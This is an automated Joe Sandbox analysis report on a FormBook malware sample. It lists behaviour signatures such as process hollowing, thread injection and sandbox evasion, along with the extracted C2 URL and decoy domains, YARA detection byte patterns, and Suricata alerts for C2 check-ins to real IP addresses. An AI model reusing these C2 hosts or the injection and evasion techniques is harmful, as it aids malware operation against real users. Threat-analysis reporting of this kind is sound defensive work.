Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kHslwiV2w6.exe

Overview

General Information

Sample name:kHslwiV2w6.exe
Analysis ID:1529053
MD5:3364dc2488f8444000a9da4c6d999fc4
SHA1:19cf9bd0f6976d75f7738ec74d2b326edee5bdde
SHA256:fcf632af143e88dfba5e9256d0fb238eb314b0d20e63141cb659ed7ad001cbb4
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • kHslwiV2w6.exe (PID: 7164 cmdline: "C:\Users\user\Desktop\kHslwiV2w6.exe" MD5: 3364DC2488F8444000A9DA4C6D999FC4)
    • conhost.exe (PID: 8 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • iexplore.exe (PID: 8164 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: BBF55D48A97497F61781C226E1CEDE6A)
    • csc.exe (PID: 1408 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • explorer.exe (PID: 4828 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • raserver.exe (PID: 6624 cmdline: "C:\Windows\SysWOW64\raserver.exe" MD5: D1053D114847677185F248FF98C3F255)
          • cmd.exe (PID: 4064 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.upcyclecharms.com/md02/"], "decoy": ["onsen1508.com", "partymaxclubmen36.click", "texasshelvingwarehouse.com", "tiantiying.com", "taxcredits-pr.com", "33mgbet.com", "equipoleiremnacional.com", "andrewghita.com", "zbbnp.xyz", "englandbreaking.com", "a1b5v.xyz", "vizamag.com", "h0lg3.rest", "ux-design-courses-17184.bond", "of84.top", "qqkartel88v1.com", "avalynkate.com", "cpuk-finance.com", "yeslabs.xyz", "webuyandsellpa.com", "barnesassetrecovery.store", "hecxion.xyz", "theopencomputeproject.net", "breezyvw.christmas", "mumazyl.com", "woby.xyz", "jalaios10.vip", "lynxpire.com", "sparkbpo.com", "333689z.com", "rslotrank.win", "adscendmfmarketing.com", "detroitreels.com", "xojiliv1.com", "mzhhxxff.xyz", "hitcomply.com", "piedge-taiko.net", "chiri.lat", "bookmygaddi.com", "hjemfinesse.shop", "zruypj169g.top", "solarfundis.com", "pittsparking.com", "teplo-invest.com", "j3k7n.xyz", "coloradoskinwellness.com", "z8ggd.com", "coinbureau.xyz", "mamasprinkleofjoy.com", "xotj7a.xyz", "nijssenadventures.com", "ysa-cn.com", "tigajco69.fun", "localhomeservicesadvisor.com", "attorney-services-8344642.zone", "rnwaifu.xyz", "nyverian.com", "family-lawyers-7009103.world", "117myw.com", "kingdom66.lat", "tdshomesolution.com", "momof2filiricans.com", "saeutah.com", "rakring.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 33 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.csc.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        3.2.csc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.csc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a49:$sqlite3step: 68 34 1C 7B E1
          • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a78:$sqlite3text: 68 38 2A 90 C5
          • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
          3.2.csc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          3.2.csc.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 15 entries

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-08T16:01:28.541848+020020314531Malware Command and Control Activity Detected192.168.11.204975191.195.240.1980TCP
          2024-10-08T16:01:28.541848+020020314531Malware Command and Control Activity Detected192.168.11.204973952.206.163.16280TCP
          2024-10-08T16:01:28.541848+020020314531Malware Command and Control Activity Detected192.168.11.2049743104.247.81.17480TCP
          2024-10-08T16:01:28.541848+020020314531Malware Command and Control Activity Detected192.168.11.2049745198.185.159.14480TCP
          2024-10-08T16:02:10.388618+020020314531Malware Command and Control Activity Detected192.168.11.2049736172.66.0.7080TCP
          2024-10-08T16:02:32.269097+020020314531Malware Command and Control Activity Detected192.168.11.2049738104.18.188.22380TCP
          2024-10-08T16:03:11.963231+020020314531Malware Command and Control Activity Detected192.168.11.2049740198.185.159.14480TCP
          2024-10-08T16:03:32.429473+020020314531Malware Command and Control Activity Detected192.168.11.2049741172.67.143.21180TCP
          2024-10-08T16:03:54.707781+020020314531Malware Command and Control Activity Detected192.168.11.2049742103.235.47.18880TCP
          2024-10-08T16:04:54.803703+020020314531Malware Command and Control Activity Detected192.168.11.204974413.248.252.11480TCP
          2024-10-08T16:06:37.473281+020020314531Malware Command and Control Activity Detected192.168.11.2049746172.67.130.4680TCP
          2024-10-08T16:06:58.163499+020020314531Malware Command and Control Activity Detected192.168.11.204974763.141.128.1680TCP
          2024-10-08T16:07:18.445512+020020314531Malware Command and Control Activity Detected192.168.11.204974813.248.169.4880TCP
          2024-10-08T16:07:41.823141+020020314531Malware Command and Control Activity Detected192.168.11.20497493.33.130.19080TCP
          2024-10-08T16:09:01.277884+020020314531Malware Command and Control Activity Detected192.168.11.2049750192.250.227.2780TCP
          2024-10-08T16:10:24.466524+020020314531Malware Command and Control Activity Detected192.168.11.204975213.248.252.11480TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.upcyclecharms.com/md02/"], "decoy": ["onsen1508.com", "partymaxclubmen36.click", "texasshelvingwarehouse.com", "tiantiying.com", "taxcredits-pr.com", "33mgbet.com", "equipoleiremnacional.com", "andrewghita.com", "zbbnp.xyz", "englandbreaking.com", "a1b5v.xyz", "vizamag.com", "h0lg3.rest", "ux-design-courses-17184.bond", "of84.top", "qqkartel88v1.com", "avalynkate.com", "cpuk-finance.com", "yeslabs.xyz", "webuyandsellpa.com", "barnesassetrecovery.store", "hecxion.xyz", "theopencomputeproject.net", "breezyvw.christmas", "mumazyl.com", "woby.xyz", "jalaios10.vip", "lynxpire.com", "sparkbpo.com", "333689z.com", "rslotrank.win", "adscendmfmarketing.com", "detroitreels.com", "xojiliv1.com", "mzhhxxff.xyz", "hitcomply.com", "piedge-taiko.net", "chiri.lat", "bookmygaddi.com", "hjemfinesse.shop", "zruypj169g.top", "solarfundis.com", "pittsparking.com", "teplo-invest.com", "j3k7n.xyz", "coloradoskinwellness.com", "z8ggd.com", "coinbureau.xyz", "mamasprinkleofjoy.com", "xotj7a.xyz", "nijssenadventures.com", "ysa-cn.com", "tigajco69.fun", "localhomeservicesadvisor.com", "attorney-services-8344642.zone", "rnwaifu.xyz", "nyverian.com", "family-lawyers-7009103.world", "117myw.com", "kingdom66.lat", "tdshomesolution.com", "momof2filiricans.com", "saeutah.com", "rakring.com"]}
          Multi AV Scanner detection for submitted file
          Source: kHslwiV2w6.exeReversingLabs: Detection: 47%
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.kHslwiV2w6.exe.1ed0971ad88.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.kHslwiV2w6.exe.1ed0958d6f0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D20115 SysStringLen,CryptDestroyKey,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,SysStringLen,SysStringLen,CryptImportKey,free,SysStringLen,CryptDecrypt,SysAllocStringByteLen,SysFreeString,free,5_2_00D20115
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D1FD30 CryptExportKey,GetLastError,malloc,CryptExportKey,GetLastError,free,5_2_00D1FD30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D1DAFB CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,5_2_00D1DAFB
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D1FA58 CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGenKey,GetLastError,GetLastError,5_2_00D1FA58
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D1FE35 CryptBinaryToStringW,GetLastError,malloc,CryptBinaryToStringW,GetLastError,free,SysFreeString,5_2_00D1FE35
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D20383 SysStringLen,CryptImportKey,GetLastError,CryptGenKey,GetLastError,CryptEncrypt,GetLastError,free,malloc,memset,memcpy,CryptEncrypt,GetLastError,free,SysFreeString,SysFreeString,CryptDestroyKey,CryptDestroyKey,SysFreeString,5_2_00D20383
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D1FF58 CryptStringToBinaryW,GetLastError,malloc,CryptStringToBinaryW,GetLastError,5_2_00D1FF58
          Source: kHslwiV2w6.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: csc.exe, 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000003.00000003.6839534586.0000000005A89000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000003.00000003.6836618547.00000000058D6000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000003.6906389856.0000000004C10000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.11882185438.000000000508D000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000005.00000003.6909732118.0000000004DB3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.11882185438.0000000004F60000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: csc.exe, csc.exe, 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000003.00000003.6839534586.0000000005A89000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000003.00000003.6836618547.00000000058D6000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, raserver.exe, 00000005.00000003.6906389856.0000000004C10000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.11882185438.000000000508D000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000005.00000003.6909732118.0000000004DB3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.11882185438.0000000004F60000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: RAServer.pdb source: csc.exe, 00000003.00000002.6908271712.0000000005FB0000.00000040.10000000.00040000.00000000.sdmp, csc.exe, 00000003.00000002.6906475717.0000000005237000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, raserver.exe, 00000005.00000002.11880773620.0000000000D10000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: StrongNameFreeBufferStrongNameTokenFromPublicKeyStrongNameErrorInfo.PDBdiasymreader.dllDllGetClassObject%X%X%X%X%X%X%X%X%X%X%X.TMP0x%016I64xCSCalink.dll with IAlink3 source: explorer.exe, 00000004.00000002.11899785830.0000000013F5F000.00000004.80000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11883241933.000000000554F000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11881524819.0000000004C14000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: RAServer.pdbGCTL source: csc.exe, 00000003.00000002.6908271712.0000000005FB0000.00000040.10000000.00040000.00000000.sdmp, csc.exe, 00000003.00000002.6906475717.0000000005237000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.11880773620.0000000000D10000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: csc.pdb source: explorer.exe, 00000004.00000002.11899785830.0000000013F5F000.00000004.80000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11883241933.000000000554F000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11881524819.0000000004C14000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: csc.pdbF source: explorer.exe, 00000004.00000002.11899785830.0000000013F5F000.00000004.80000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11883241933.000000000554F000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11881524819.0000000004C14000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 4x nop then mov rax, rcx0_2_00007FF72F619FC0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 4x nop then push rbx0_2_00007FF72F65CC30
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 4x nop then sub rsp, 28h0_2_00007FF72F687A90
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 4x nop then push rbx0_2_00007FF72F62FAA0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 4x nop then sub rsp, 28h0_2_00007FF72F62F9C0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 4x nop then push rdi0_2_00007FF72F684450
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 4x nop then push rdi0_2_00007FF72F680200
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4x nop then pop esi3_2_0041731B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4x nop then pop ebx3_2_00407B20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop esi5_2_00C6731B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop ebx5_2_00C57B22

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49748 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49752 -> 13.248.252.114:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49744 -> 13.248.252.114:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49752 -> 13.248.252.114:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49749 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49752 -> 13.248.252.114:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49746 -> 172.67.130.46:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49748 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49749 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49744 -> 13.248.252.114:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49749 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49746 -> 172.67.130.46:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49741 -> 172.67.143.211:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49746 -> 172.67.130.46:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49741 -> 172.67.143.211:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49744 -> 13.248.252.114:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49741 -> 172.67.143.211:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49736 -> 172.66.0.70:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49748 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49736 -> 172.66.0.70:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49736 -> 172.66.0.70:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49738 -> 104.18.188.223:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49738 -> 104.18.188.223:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49738 -> 104.18.188.223:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49740 -> 198.185.159.144:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49740 -> 198.185.159.144:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49740 -> 198.185.159.144:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49742 -> 103.235.47.188:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49742 -> 103.235.47.188:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49742 -> 103.235.47.188:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49747 -> 63.141.128.16:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49747 -> 63.141.128.16:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49747 -> 63.141.128.16:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49750 -> 192.250.227.27:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49750 -> 192.250.227.27:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49750 -> 192.250.227.27:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49751 -> 91.195.240.19:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49751 -> 91.195.240.19:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49751 -> 91.195.240.19:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49739 -> 52.206.163.162:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49739 -> 52.206.163.162:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49739 -> 52.206.163.162:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49743 -> 104.247.81.174:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49743 -> 104.247.81.174:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49743 -> 104.247.81.174:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49745 -> 198.185.159.144:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49745 -> 198.185.159.144:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49745 -> 198.185.159.144:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 172.66.0.70 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.upcyclecharms.com/md02/
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.yeslabs.xyz
          Source: DNS query: www.woby.xyz
          Source: DNS query: www.j3k7n.xyz
          Source: DNS query: www.coinbureau.xyz
